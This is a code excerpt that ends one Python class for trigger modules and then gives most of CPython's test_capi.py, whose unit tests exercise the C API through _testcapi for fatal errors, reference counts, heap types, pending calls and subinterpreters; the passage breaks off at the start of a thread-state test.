        raise NotImplementedError()

    def __init__(self, queue_class=IncrementalQueue, **kwargs):
        # Bug fix: forward the caller-supplied queue_class instead of always
        # passing the default IncrementalQueue (the argument was ignored).
        super().__init__(queue_class=queue_class, **kwargs)

    def _run(self):
        # Idle loop: a trigger module emits nothing by itself; the sleep keeps
        # CPU usage low and bounds how long the mutex is held per iteration,
        # while stop() ends the loop by clearing is_running.
        self.prepare_run()
        self.is_running = True
        while self.is_running:
            with self.mutex:
                time.sleep(0.05)
        self.shutdown()

    def process_update(self, update_message):
        # Never invoked with real input (input_ius is empty); explicit no-op.
        return None

    def trigger(self, data={}, update_type=UpdateType.ADD):
        """The trigger method that should produce an update message and append it to the
        right buffer

        Args:
            data (dict): A dictionary with data that can be used for the trigger
            update_type (UpdateType): The update type that the IU should have. Default
                is UpdateType.ADD
        """
        raise NotImplementedError()
|
test_capi.py | # Run the _testcapi module tests (tests for the Python/C API): by defn,
# these are all functions _testcapi exports whose name begins with 'test_'.
from collections import OrderedDict
import _thread
import importlib.machinery
import importlib.util
import os
import pickle
import random
import re
import subprocess
import sys
import textwrap
import threading
import time
import unittest
import weakref
from test import support
from test.support import MISSING_C_DOCSTRINGS
from test.support import import_helper
from test.support import threading_helper
from test.support import warnings_helper
from test.support.script_helper import assert_python_failure, assert_python_ok
try:
import _posixsubprocess
except ImportError:
_posixsubprocess = None
try:
import _testmultiphase
except ImportError:
_testmultiphase = None
# Skip this test if the _testcapi module isn't available.
_testcapi = import_helper.import_module('_testcapi')
import _testinternalcapi
# Were we compiled --with-pydebug or with #define Py_DEBUG?
# sys.gettotalrefcount only exists in debug builds, so its presence is the probe.
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
def decode_stderr(err):
    """Decode captured stderr bytes to text, dropping carriage returns.

    Undecodable bytes become U+FFFD so assertions on the text never raise.
    """
    text = err.decode('utf-8', errors='replace')
    return text.replace('\r', '')
# Plain function used as a fixture: InstanceMethod below wraps it with
# _testcapi.instancemethod, and test_instancemethod checks that the wrapping
# preserves this docstring and function attributes.
def testfunction(self):
    """some doc"""
    return self
class InstanceMethod:
    # Wrap a builtin (id) and a Python function with _testcapi.instancemethod
    # so they bind as instance methods; presumably this exercises
    # PyInstanceMethod_Type — confirm in Modules/_testcapimodule.c.
    id = _testcapi.instancemethod(id)
    testfunction = _testcapi.instancemethod(testfunction)
class CAPITest(unittest.TestCase):
def test_instancemethod(self):
inst = InstanceMethod()
self.assertEqual(id(inst), inst.id())
self.assertTrue(inst.testfunction() is inst)
self.assertEqual(inst.testfunction.__doc__, testfunction.__doc__)
self.assertEqual(InstanceMethod.testfunction.__doc__, testfunction.__doc__)
InstanceMethod.testfunction.attribute = "test"
self.assertEqual(testfunction.attribute, "test")
self.assertRaises(AttributeError, setattr, inst.testfunction, "attribute", "test")
    @support.requires_subprocess()
    def test_no_FatalError_infinite_loop(self):
        # Crash a subprocess with no current thread state and check the fatal
        # error is reported once instead of looping forever.
        with support.SuppressCrashReport():
            p = subprocess.Popen([sys.executable, "-c",
                                  'import _testcapi;'
                                  '_testcapi.crash_no_current_thread()'],
                                 stdout=subprocess.PIPE,
                                 stderr=subprocess.PIPE)
        (out, err) = p.communicate()
        self.assertEqual(out, b'')
        # This used to cause an infinite loop.
        self.assertTrue(err.rstrip().startswith(
                         b'Fatal Python error: '
                         b'PyThreadState_Get: '
                         b'the function must be called with the GIL held, '
                         b'but the GIL is released '
                         b'(the current Python thread state is NULL)'),
                        err)
    def test_memoryview_from_NULL_pointer(self):
        # Building a memoryview over a NULL buffer must raise, not crash.
        self.assertRaises(ValueError, _testcapi.make_memoryview_from_NULL_pointer)
def test_exc_info(self):
raised_exception = ValueError("5")
new_exc = TypeError("TEST")
try:
raise raised_exception
except ValueError as e:
tb = e.__traceback__
orig_sys_exc_info = sys.exc_info()
orig_exc_info = _testcapi.set_exc_info(new_exc.__class__, new_exc, None)
new_sys_exc_info = sys.exc_info()
new_exc_info = _testcapi.set_exc_info(*orig_exc_info)
reset_sys_exc_info = sys.exc_info()
self.assertEqual(orig_exc_info[1], e)
self.assertSequenceEqual(orig_exc_info, (raised_exception.__class__, raised_exception, tb))
self.assertSequenceEqual(orig_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(reset_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(new_exc_info, (new_exc.__class__, new_exc, None))
self.assertSequenceEqual(new_sys_exc_info, new_exc_info)
else:
self.assertTrue(False)
    @unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
    def test_seq_bytes_to_charp_array(self):
        # Issue #15732: crash in _PySequence_BytesToCharpArray()
        # __len__ says 1 but there is no __getitem__: must raise, not crash.
        class Z(object):
            def __len__(self):
                return 1
        self.assertRaises(TypeError, _posixsubprocess.fork_exec,
                          1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)
        # Issue #15736: overflow in _PySequence_BytesToCharpArray()
        class Z(object):
            def __len__(self):
                return sys.maxsize
            def __getitem__(self, i):
                return b'x'
        self.assertRaises(MemoryError, _posixsubprocess.fork_exec,
                          1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)
    @unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
    def test_subprocess_fork_exec(self):
        # A sequence-like first argument with no items must raise, not crash.
        class Z(object):
            def __len__(self):
                return 1

        # Issue #15738: crash in subprocess_fork_exec()
        self.assertRaises(TypeError, _posixsubprocess.fork_exec,
                          Z(),[b'1'],3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)
    @unittest.skipIf(MISSING_C_DOCSTRINGS,
                     "Signature information for builtins requires docstrings")
    def test_docstring_signature_parsing(self):
        # Valid "name($module, /, arg)\n--\n\n" headers are split off the C
        # docstring into __text_signature__; invalid headers are left in
        # __doc__ with __text_signature__ set to None.
        self.assertEqual(_testcapi.no_docstring.__doc__, None)
        self.assertEqual(_testcapi.no_docstring.__text_signature__, None)

        self.assertEqual(_testcapi.docstring_empty.__doc__, None)
        self.assertEqual(_testcapi.docstring_empty.__text_signature__, None)

        self.assertEqual(_testcapi.docstring_no_signature.__doc__,
            "This docstring has no signature.")
        self.assertEqual(_testcapi.docstring_no_signature.__text_signature__, None)

        self.assertEqual(_testcapi.docstring_with_invalid_signature.__doc__,
            "docstring_with_invalid_signature($module, /, boo)\n"
            "\n"
            "This docstring has an invalid signature."
            )
        self.assertEqual(_testcapi.docstring_with_invalid_signature.__text_signature__, None)

        self.assertEqual(_testcapi.docstring_with_invalid_signature2.__doc__,
            "docstring_with_invalid_signature2($module, /, boo)\n"
            "\n"
            "--\n"
            "\n"
            "This docstring also has an invalid signature."
            )
        self.assertEqual(_testcapi.docstring_with_invalid_signature2.__text_signature__, None)

        self.assertEqual(_testcapi.docstring_with_signature.__doc__,
            "This docstring has a valid signature.")
        self.assertEqual(_testcapi.docstring_with_signature.__text_signature__, "($module, /, sig)")

        self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__doc__, None)
        self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__text_signature__,
            "($module, /, sig)")

        self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__doc__,
            "\nThis docstring has a valid signature and some extra newlines.")
        self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__text_signature__,
            "($module, /, parameter)")
    def test_c_type_with_matrix_multiplication(self):
        # A C type with nb_matrix_multiply slots: check @, reflected @, and @=
        # (falling back to __matmul__ when the left operand has no __imatmul__).
        M = _testcapi.matmulType
        m1 = M()
        m2 = M()
        self.assertEqual(m1 @ m2, ("matmul", m1, m2))
        self.assertEqual(m1 @ 42, ("matmul", m1, 42))
        self.assertEqual(42 @ m1, ("matmul", 42, m1))
        o = m1
        o @= m2
        self.assertEqual(o, ("imatmul", m1, m2))
        o = m1
        o @= 42
        self.assertEqual(o, ("imatmul", m1, 42))
        o = 42
        o @= m1
        self.assertEqual(o, ("matmul", 42, m1))
    def test_c_type_with_ipow(self):
        # When the __ipow__ method of a type was implemented in C, using the
        # modulo param would cause segfaults.
        o = _testcapi.ipowType()
        self.assertEqual(o.__ipow__(1), (1, None))
        self.assertEqual(o.__ipow__(2, 2), (2, 2))
    def test_return_null_without_error(self):
        # Issue #23571: A function must not return NULL without setting an
        # error
        if Py_DEBUG:
            # Debug builds abort with a fatal error; run in a subprocess and
            # match the stderr report.
            code = textwrap.dedent("""
                import _testcapi
                from test import support

                with support.SuppressCrashReport():
                    _testcapi.return_null_without_error()
            """)
            rc, out, err = assert_python_failure('-c', code)
            err = decode_stderr(err)
            self.assertRegex(err,
                             r'Fatal Python error: _Py_CheckFunctionResult: '
                                r'a function returned NULL without setting an exception\n'
                             r'Python runtime state: initialized\n'
                             r'SystemError: <built-in function return_null_without_error> '
                                r'returned NULL without setting an exception\n'
                             r'\n'
                             r'Current thread.*:\n'
                             r'  File .*", line 6 in <module>\n')
        else:
            # Release builds convert the bad result into a SystemError.
            with self.assertRaises(SystemError) as cm:
                _testcapi.return_null_without_error()
            self.assertRegex(str(cm.exception),
                             'return_null_without_error.* '
                             'returned NULL without setting an exception')
    def test_return_result_with_error(self):
        # Issue #23571: A function must not return a result with an error set
        if Py_DEBUG:
            # Debug builds abort with a fatal error; run in a subprocess and
            # match the stderr report.
            code = textwrap.dedent("""
                import _testcapi
                from test import support

                with support.SuppressCrashReport():
                    _testcapi.return_result_with_error()
            """)
            rc, out, err = assert_python_failure('-c', code)
            err = decode_stderr(err)
            self.assertRegex(err,
                             r'Fatal Python error: _Py_CheckFunctionResult: '
                                 r'a function returned a result with an exception set\n'
                             r'Python runtime state: initialized\n'
                             r'ValueError\n'
                             r'\n'
                             r'The above exception was the direct cause '
                                r'of the following exception:\n'
                             r'\n'
                             r'SystemError: <built-in '
                                r'function return_result_with_error> '
                                r'returned a result with an exception set\n'
                             r'\n'
                             r'Current thread.*:\n'
                             r'  File .*, line 6 in <module>\n')
        else:
            # Release builds chain the pending error into a SystemError.
            with self.assertRaises(SystemError) as cm:
                _testcapi.return_result_with_error()
            self.assertRegex(str(cm.exception),
                             'return_result_with_error.* '
                             'returned a result with an exception set')
    def test_getitem_with_error(self):
        # Test _Py_CheckSlotResult(). Raise an exception and then calls
        # PyObject_GetItem(): check that the assertion catches the bug.
        # PyObject_GetItem() must not be called with an exception set.
        code = textwrap.dedent("""
            import _testcapi
            from test import support

            with support.SuppressCrashReport():
                _testcapi.getitem_with_error({1: 2}, 1)
        """)
        rc, out, err = assert_python_failure('-c', code)
        err = decode_stderr(err)
        if 'SystemError: ' not in err:
            # Assertions enabled: a fatal error report is expected.
            self.assertRegex(err,
                             r'Fatal Python error: _Py_CheckSlotResult: '
                                r'Slot __getitem__ of type dict succeeded '
                                r'with an exception set\n'
                             r'Python runtime state: initialized\n'
                             r'ValueError: bug\n'
                             r'\n'
                             r'Current thread .* \(most recent call first\):\n'
                             r'  File .*, line 6 in <module>\n'
                             r'\n'
                             r'Extension modules: _testcapi \(total: 1\)\n')
        else:
            # Python built with NDEBUG macro defined:
            # test _Py_CheckFunctionResult() instead.
            self.assertIn('returned a result with an exception set', err)
    def test_buildvalue_N(self):
        # The refcount checks for Py_BuildValue("N", ...) live in C; the C
        # helper raises on failure, so simply calling it is the test.
        _testcapi.test_buildvalue_N()
    def test_set_nomemory(self):
        # Exercise _testcapi.set_nomemory()/remove_mem_hooks() in a subprocess:
        # allocations start failing with MemoryError after `start` allocations.
        code = """if 1:
            import _testcapi
            class C(): pass

            # The first loop tests both functions and that remove_mem_hooks()
            # can be called twice in a row. The second loop checks a call to
            # set_nomemory() after a call to remove_mem_hooks(). The third
            # loop checks the start and stop arguments of set_nomemory().
            for outer_cnt in range(1, 4):
                start = 10 * outer_cnt
                for j in range(100):
                    if j == 0:
                        if outer_cnt != 3:
                            _testcapi.set_nomemory(start)
                        else:
                            _testcapi.set_nomemory(start, start + 1)
                    try:
                        C()
                    except MemoryError as e:
                        if outer_cnt != 3:
                            _testcapi.remove_mem_hooks()
                        print('MemoryError', outer_cnt, j)
                        _testcapi.remove_mem_hooks()
                        break
        """
        rc, out, err = assert_python_ok('-c', code)
        lines = out.splitlines()
        for i, line in enumerate(lines, 1):
            self.assertIn(b'MemoryError', out)
            # The reported allocation count must fall in the expected window
            # (each outer round allows i*5 allocations, give or take one).
            *_, count = line.split(b' ')
            count = int(count)
            self.assertLessEqual(count, i*5)
            self.assertGreaterEqual(count, i*5-1)
    def test_mapping_keys_values_items(self):
        # PyMapping_Keys/Values/Items must return lists regardless of whether
        # the mapping's own keys()/values()/items() return lists or tuples.
        class Mapping1(dict):
            def keys(self):
                return list(super().keys())
            def values(self):
                return list(super().values())
            def items(self):
                return list(super().items())
        class Mapping2(dict):
            def keys(self):
                return tuple(super().keys())
            def values(self):
                return tuple(super().values())
            def items(self):
                return tuple(super().items())
        dict_obj = {'foo': 1, 'bar': 2, 'spam': 3}

        for mapping in [{}, OrderedDict(), Mapping1(), Mapping2(),
                        dict_obj, OrderedDict(dict_obj),
                        Mapping1(dict_obj), Mapping2(dict_obj)]:
            self.assertListEqual(_testcapi.get_mapping_keys(mapping),
                                 list(mapping.keys()))
            self.assertListEqual(_testcapi.get_mapping_values(mapping),
                                 list(mapping.values()))
            self.assertListEqual(_testcapi.get_mapping_items(mapping),
                                 list(mapping.items()))
    def test_mapping_keys_values_items_bad_arg(self):
        # None has no keys()/values()/items() -> AttributeError; a mapping
        # whose accessors return a non-sequence (None) -> TypeError.
        self.assertRaises(AttributeError, _testcapi.get_mapping_keys, None)
        self.assertRaises(AttributeError, _testcapi.get_mapping_values, None)
        self.assertRaises(AttributeError, _testcapi.get_mapping_items, None)

        class BadMapping:
            def keys(self):
                return None
            def values(self):
                return None
            def items(self):
                return None
        bad_mapping = BadMapping()
        self.assertRaises(TypeError, _testcapi.get_mapping_keys, bad_mapping)
        self.assertRaises(TypeError, _testcapi.get_mapping_values, bad_mapping)
        self.assertRaises(TypeError, _testcapi.get_mapping_items, bad_mapping)
    @unittest.skipUnless(hasattr(_testcapi, 'negative_refcount'),
                         'need _testcapi.negative_refcount')
    def test_negative_refcount(self):
        # bpo-35059: Check that Py_DECREF() reports the correct filename
        # when calling _Py_NegativeRefcount() to abort Python.
        code = textwrap.dedent("""
            import _testcapi
            from test import support

            with support.SuppressCrashReport():
                _testcapi.negative_refcount()
        """)
        rc, out, err = assert_python_failure('-c', code)
        self.assertRegex(err,
                         br'_testcapimodule\.c:[0-9]+: '
                         br'_Py_NegativeRefcount: Assertion failed: '
                         br'object has negative ref count')
    def test_trashcan_subclass(self):
        # bpo-35983: Check that the trashcan mechanism for "list" is NOT
        # activated when its tp_dealloc is being called by a subclass
        from _testcapi import MyList
        L = None
        # Build a 1000-deep nested chain; deallocating it must not overflow
        # the C stack nor trip the trashcan prematurely.
        for i in range(1000):
            L = MyList((L,))
    @support.requires_resource('cpu')
    def test_trashcan_python_class1(self):
        # Trashcan check with a plain Python subclass of list.
        self.do_test_trashcan_python_class(list)
    @support.requires_resource('cpu')
    def test_trashcan_python_class2(self):
        # Same check, but with the C-defined list subclass from _testcapi.
        from _testcapi import MyList
        self.do_test_trashcan_python_class(MyList)
    def do_test_trashcan_python_class(self, base):
        # Check that the trashcan mechanism works properly for a Python
        # subclass of a class using the trashcan (this specific test assumes
        # that the base class "base" behaves like list)
        class PyList(base):
            # Count the number of PyList instances to verify that there is
            # no memory leak
            num = 0
            def __init__(self, *args):
                __class__.num += 1
                super().__init__(*args)
            def __del__(self):
                __class__.num -= 1

        for parity in (0, 1):
            L = None
            # We need in the order of 2**20 iterations here such that a
            # typical 8MB stack would overflow without the trashcan.
            for i in range(2**20):
                L = PyList((L,))
                L.attr = i
            if parity:
                # Add one additional nesting layer
                L = (L,)
            self.assertGreater(PyList.num, 0)
            del L
            # Every instance must have been finalized exactly once.
            self.assertEqual(PyList.num, 0)
    def test_heap_ctype_doc_and_text_signature(self):
        # A heap type created with a "sig)\n--\n\ndoc" tp_doc must split it
        # into __text_signature__ and __doc__.
        self.assertEqual(_testcapi.HeapDocCType.__doc__, "somedoc")
        self.assertEqual(_testcapi.HeapDocCType.__text_signature__, "(arg1, arg2)")
    def test_null_type_doc(self):
        # A heap type with tp_doc left NULL must expose __doc__ as None.
        self.assertEqual(_testcapi.NullTpDocType.__doc__, None)
    def test_subclass_of_heap_gc_ctype_with_tpdealloc_decrefs_once(self):
        # subtype_dealloc must drop exactly one reference to the (heap) type
        # when an instance of a Python subclass dies.
        class HeapGcCTypeSubclass(_testcapi.HeapGcCType):
            def __init__(self):
                self.value2 = 20
                super().__init__()

        subclass_instance = HeapGcCTypeSubclass()
        type_refcnt = sys.getrefcount(HeapGcCTypeSubclass)

        # Test that subclass instance was fully created
        self.assertEqual(subclass_instance.value, 10)
        self.assertEqual(subclass_instance.value2, 20)

        # Test that the type reference count is only decremented once
        del subclass_instance
        self.assertEqual(type_refcnt - 1, sys.getrefcount(HeapGcCTypeSubclass))
    def test_subclass_of_heap_gc_ctype_with_del_modifying_dunder_class_only_decrefs_once(self):
        # If __del__ reassigns __class__, subtype_dealloc must decref the NEW
        # class exactly once and still release the old class's reference.
        class A(_testcapi.HeapGcCType):
            def __init__(self):
                self.value2 = 20
                super().__init__()

        class B(A):
            def __init__(self):
                super().__init__()

            def __del__(self):
                self.__class__ = A
                A.refcnt_in_del = sys.getrefcount(A)
                B.refcnt_in_del = sys.getrefcount(B)

        subclass_instance = B()
        type_refcnt = sys.getrefcount(B)
        new_type_refcnt = sys.getrefcount(A)

        # Test that subclass instance was fully created
        self.assertEqual(subclass_instance.value, 10)
        self.assertEqual(subclass_instance.value2, 20)

        del subclass_instance

        # Test that setting __class__ modified the reference counts of the types
        self.assertEqual(type_refcnt - 1, B.refcnt_in_del)
        self.assertEqual(new_type_refcnt + 1, A.refcnt_in_del)

        # Test that the original type already has decreased its refcnt
        self.assertEqual(type_refcnt - 1, sys.getrefcount(B))

        # Test that subtype_dealloc decref the newly assigned __class__ only once
        self.assertEqual(new_type_refcnt, sys.getrefcount(A))
    def test_heaptype_with_dict(self):
        # Heap type with Py_TPFLAGS-managed instance dict (positive dictoffset,
        # judging by the sibling "negative" test): attributes land in __dict__.
        inst = _testcapi.HeapCTypeWithDict()
        inst.foo = 42
        self.assertEqual(inst.foo, 42)
        self.assertEqual(inst.dictobj, inst.__dict__)
        self.assertEqual(inst.dictobj, {"foo": 42})

        inst = _testcapi.HeapCTypeWithDict()
        self.assertEqual({}, inst.__dict__)
    def test_heaptype_with_negative_dict(self):
        # Same checks for a heap type whose tp_dictoffset is negative
        # (dict pointer stored at the end of the instance).
        inst = _testcapi.HeapCTypeWithNegativeDict()
        inst.foo = 42
        self.assertEqual(inst.foo, 42)
        self.assertEqual(inst.dictobj, inst.__dict__)
        self.assertEqual(inst.dictobj, {"foo": 42})

        inst = _testcapi.HeapCTypeWithNegativeDict()
        self.assertEqual({}, inst.__dict__)
def test_heaptype_with_weakref(self):
    """A heap C type with weakref support can be weakly referenced."""
    target = _testcapi.HeapCTypeWithWeakref()
    wr = weakref.ref(target)
    self.assertEqual(wr(), target)
    self.assertEqual(target.weakreflist, wr)
def test_heaptype_with_buffer(self):
    """bytes() consumes the heap type's buffer protocol export."""
    exporter = _testcapi.HeapCTypeWithBuffer()
    self.assertEqual(bytes(exporter), b"1234")
def test_c_subclass_of_heap_ctype_with_tpdealloc_decrefs_once(self):
    # The subclass here is defined entirely in C; deallocating an
    # instance must drop exactly one reference to its type object.
    subclass_instance = _testcapi.HeapCTypeSubclass()
    type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclass)

    # Test that subclass instance was fully created
    self.assertEqual(subclass_instance.value, 10)
    self.assertEqual(subclass_instance.value2, 20)

    # Test that the type reference count is only decremented once
    del subclass_instance
    self.assertEqual(type_refcnt - 1, sys.getrefcount(_testcapi.HeapCTypeSubclass))
def test_c_subclass_of_heap_ctype_with_del_modifying_dunder_class_only_decrefs_once(self):
    # C-level analogue of the Python __del__ test above: the C type's
    # tp_finalize swaps __class__, and neither type may be over-decref'd.
    subclass_instance = _testcapi.HeapCTypeSubclassWithFinalizer()
    type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclassWithFinalizer)
    new_type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclass)

    # Test that subclass instance was fully created
    self.assertEqual(subclass_instance.value, 10)
    self.assertEqual(subclass_instance.value2, 20)

    # The tp_finalize slot will set __class__ to HeapCTypeSubclass
    del subclass_instance

    # Test that setting __class__ modified the reference counts of the types
    self.assertEqual(type_refcnt - 1, _testcapi.HeapCTypeSubclassWithFinalizer.refcnt_in_del)
    self.assertEqual(new_type_refcnt + 1, _testcapi.HeapCTypeSubclass.refcnt_in_del)

    # Test that the original type already has decreased its refcnt
    self.assertEqual(type_refcnt - 1, sys.getrefcount(_testcapi.HeapCTypeSubclassWithFinalizer))

    # Test that subtype_dealloc decref the newly assigned __class__ only once
    self.assertEqual(new_type_refcnt, sys.getrefcount(_testcapi.HeapCTypeSubclass))
def test_heaptype_with_setattro(self):
    """The heap type's custom setattr/delattr slots drive `pvalue`."""
    target = _testcapi.HeapCTypeSetattr()
    self.assertEqual(target.pvalue, 10)
    target.value = 12
    self.assertEqual(target.pvalue, 12)
    # Deleting the attribute resets pvalue to 0.
    del target.value
    self.assertEqual(target.pvalue, 0)
def test_pynumber_tobase(self):
    """PyNumber_ToBase formats ints in bases 2/8/10/16, rejects others."""
    from _testcapi import pynumber_tobase
    expected = {2: '0b1111011', 8: '0o173', 10: '123', 16: '0x7b'}
    for base, text in expected.items():
        self.assertEqual(pynumber_tobase(123, base), text)
        self.assertEqual(pynumber_tobase(-123, base), '-' + text)
    # Non-int arguments are rejected with TypeError...
    self.assertRaises(TypeError, pynumber_tobase, 123.0, 10)
    self.assertRaises(TypeError, pynumber_tobase, '123', 10)
    # ...and an unsupported base is a SystemError from the C API.
    self.assertRaises(SystemError, pynumber_tobase, 123, 0)
def check_fatal_error(self, code, expected, not_expected=()):
    """Run *code* in a subprocess, expect a Py_FatalError, and verify
    the 'Extension modules:' line of the resulting crash report.

    *expected* / *not_expected* are module names that must / must not
    appear; the reported total must match the parsed module count.
    """
    with support.SuppressCrashReport():
        rc, out, err = assert_python_failure('-sSI', '-c', code)

    err = decode_stderr(err)
    self.assertIn('Fatal Python error: test_fatal_error: MESSAGE\n',
                  err)

    match = re.search(r'^Extension modules:(.*) \(total: ([0-9]+)\)$',
                      err, re.MULTILINE)
    if not match:
        self.fail(f"Cannot find 'Extension modules:' in {err!r}")
    modules = set(match.group(1).strip().split(', '))
    total = int(match.group(2))

    for name in expected:
        self.assertIn(name, modules)
    for name in not_expected:
        self.assertNotIn(name, modules)
    self.assertEqual(len(modules), total)
def test_fatal_error(self):
    """The crash report lists test modules but ignores stdlib ones."""
    # By default, stdlib extension modules are ignored,
    # but not test modules.
    expected = ('_testcapi',)
    not_expected = ('sys',)
    code = 'import _testcapi, sys; _testcapi.fatal_error(b"MESSAGE")'
    self.check_fatal_error(code, expected, not_expected)

    # Mark _testcapi as stdlib module, but not sys
    expected = ('sys',)
    not_expected = ('_testcapi',)
    code = textwrap.dedent('''
        import _testcapi, sys
        sys.stdlib_module_names = frozenset({"_testcapi"})
        _testcapi.fatal_error(b"MESSAGE")
    ''')
    self.check_fatal_error(code, expected)
def test_pyobject_repr_from_null(self):
    """repr of a NULL object pointer yields the '<NULL>' placeholder."""
    self.assertEqual(_testcapi.pyobject_repr_from_null(), '<NULL>')
def test_pyobject_str_from_null(self):
    """str of a NULL object pointer yields the '<NULL>' placeholder."""
    self.assertEqual(_testcapi.pyobject_str_from_null(), '<NULL>')
def test_pyobject_bytes_from_null(self):
    """bytes of a NULL object pointer yields the b'<NULL>' placeholder."""
    self.assertEqual(_testcapi.pyobject_bytes_from_null(), b'<NULL>')
def test_Py_CompileString(self):
    # Check that Py_CompileString respects the coding cookie
    _compile = _testcapi.Py_CompileString
    # b'\xc2\xa4' is one char under utf-8 but two chars under the
    # declared latin1 cookie; co_consts must match builtin compile().
    code = b"# -*- coding: latin1 -*-\nprint('\xc2\xa4')\n"
    result = _compile(code)
    expected = compile(code, "<string>", "exec")
    self.assertEqual(result.co_consts, expected.co_consts)
def test_export_symbols(self):
    # bpo-44133: Ensure that the "Py_FrozenMain" and
    # "PyThread_get_thread_native_id" symbols are exported by the Python
    # (directly by the binary, or via by the Python dynamic library).
    ctypes = import_helper.import_module('ctypes')
    names = []

    # Test if the PY_HAVE_THREAD_NATIVE_ID macro is defined
    if hasattr(_thread, 'get_native_id'):
        names.append('PyThread_get_thread_native_id')

    # Python/frozenmain.c fails to build on Windows when the symbols are
    # missing:
    # - PyWinFreeze_ExeInit
    # - PyWinFreeze_ExeTerm
    # - PyInitFrozenExtensions
    if os.name != 'nt':
        names.append('Py_FrozenMain')

    for name in names:
        with self.subTest(name=name):
            self.assertTrue(hasattr(ctypes.pythonapi, name))
class TestPendingCalls(unittest.TestCase):
    """Exercise the pending-call machinery via _testcapi._pending_threadfunc,
    both from the main thread and from a pool of worker threads."""

    def pendingcalls_submit(self, l, n):
        # Submit `callback` n times; each accepted submission eventually
        # appends one None to l when the main thread services the queue.
        def callback():
            #this function can be interrupted by thread switching so let's
            #use an atomic operation
            l.append(None)

        for i in range(n):
            time.sleep(random.random()*0.02) #0.01 secs on average
            #try submitting callback until successful.
            #rely on regular interrupt to flush queue if we are
            #unsuccessful.
            while True:
                if _testcapi._pending_threadfunc(callback):
                    break

    def pendingcalls_wait(self, l, n, context = None):
        #now, stick around until l[0] has grown to 10
        count = 0
        while len(l) != n:
            #this busy loop is where we expect to be interrupted to
            #run our callbacks. Note that callbacks are only run on the
            #main thread
            if False and support.verbose:
                print("(%i)"%(len(l),),)
            for i in range(1000):
                a = i*i
            # Only start counting toward the timeout once all submitter
            # threads have finished (context.event is set).
            if context and not context.event.is_set():
                continue
            count += 1
            self.assertTrue(count < 10000,
                "timeout waiting for %i callbacks, got %i"%(n, len(l)))
        if False and support.verbose:
            print("(%i)"%(len(l),))

    def test_pendingcalls_threaded(self):
        #do every callback on a separate thread
        n = 32 #total callbacks
        threads = []
        class foo(object):pass
        context = foo()
        context.l = []
        context.n = 2 #submits per thread
        context.nThreads = n // context.n
        context.nFinished = 0
        context.lock = threading.Lock()
        context.event = threading.Event()

        threads = [threading.Thread(target=self.pendingcalls_thread,
                                    args=(context,))
                   for i in range(context.nThreads)]
        with threading_helper.start_threads(threads):
            self.pendingcalls_wait(context.l, n, context)

    def pendingcalls_thread(self, context):
        # Worker: submit, then record completion; the last finisher sets
        # the event so the waiter's timeout counter can start.
        try:
            self.pendingcalls_submit(context.l, context.n)
        finally:
            with context.lock:
                context.nFinished += 1
                nFinished = context.nFinished
                if False and support.verbose:
                    print("finished threads: ", nFinished)
        if nFinished == context.nThreads:
            context.event.set()

    def test_pendingcalls_non_threaded(self):
        #again, just using the main thread, likely they will all be dispatched at
        #once. It is ok to ask for too many, because we loop until we find a slot.
        #the loop can be interrupted to dispatch.
        #there are only 32 dispatch slots, so we go for twice that!
        l = []
        n = 64
        self.pendingcalls_submit(l, n)
        self.pendingcalls_wait(l, n)
class SubinterpreterTest(unittest.TestCase):
    """Checks isolation (and deliberate sharing) between subinterpreters."""

    def test_subinterps(self):
        # A subinterpreter must get its own sys.modules and builtins.
        import builtins
        r, w = os.pipe()
        code = """if 1:
            import sys, builtins, pickle
            with open({:d}, "wb") as f:
                pickle.dump(id(sys.modules), f)
                pickle.dump(id(builtins), f)
            """.format(w)
        with open(r, "rb") as f:
            ret = support.run_in_subinterp(code)
            self.assertEqual(ret, 0)
            self.assertNotEqual(pickle.load(f), id(sys.modules))
            self.assertNotEqual(pickle.load(f), id(builtins))

    def test_subinterps_recent_language_features(self):
        # Smoke-test newer syntax inside a subinterpreter.
        r, w = os.pipe()
        code = """if 1:
            import pickle
            with open({:d}, "wb") as f:

                @(lambda x:x)  # Py 3.9
                def noop(x): return x

                a = (b := f'1{{2}}3') + noop('x')  # Py 3.8 (:=) / 3.6 (f'')

                async def foo(arg): return await arg  # Py 3.5

                pickle.dump(dict(a=a, b=b), f)
            """.format(w)

        with open(r, "rb") as f:
            ret = support.run_in_subinterp(code)
            self.assertEqual(ret, 0)
            self.assertEqual(pickle.load(f), {'a': '123x', 'b': '123'})

    def test_mutate_exception(self):
        """
        Exceptions saved in global module state get shared between
        individual module instances. This test checks whether or not
        a change in one interpreter's module gets reflected into the
        other ones.
        """
        import binascii

        support.run_in_subinterp("import binascii; binascii.Error.foobar = 'foobar'")

        self.assertFalse(hasattr(binascii.Error, "foobar"))

    @unittest.skipIf(_testmultiphase is None, "test requires _testmultiphase module")
    def test_module_state_shared_in_global(self):
        """
        bpo-44050: Extension module state should be shared between interpreters
        when it doesn't support sub-interpreters.
        """
        r, w = os.pipe()
        self.addCleanup(os.close, r)
        self.addCleanup(os.close, w)

        script = textwrap.dedent(f"""
            import importlib.machinery
            import importlib.util
            import os

            fullname = '_test_module_state_shared'
            origin = importlib.util.find_spec('_testmultiphase').origin
            loader = importlib.machinery.ExtensionFileLoader(fullname, origin)
            spec = importlib.util.spec_from_loader(fullname, loader)
            module = importlib.util.module_from_spec(spec)
            attr_id = str(id(module.Error)).encode()

            os.write({w}, attr_id)
            """)
        exec(script)
        main_attr_id = os.read(r, 100)

        ret = support.run_in_subinterp(script)
        self.assertEqual(ret, 0)
        subinterp_attr_id = os.read(r, 100)
        # Same id in both interpreters => the module state was shared.
        self.assertEqual(main_attr_id, subinterp_attr_id)
class TestThreadState(unittest.TestCase):
    """Thread-state tests driven via _testcapi._test_thread_state."""

    @threading_helper.reap_threads
    def test_thread_state(self):
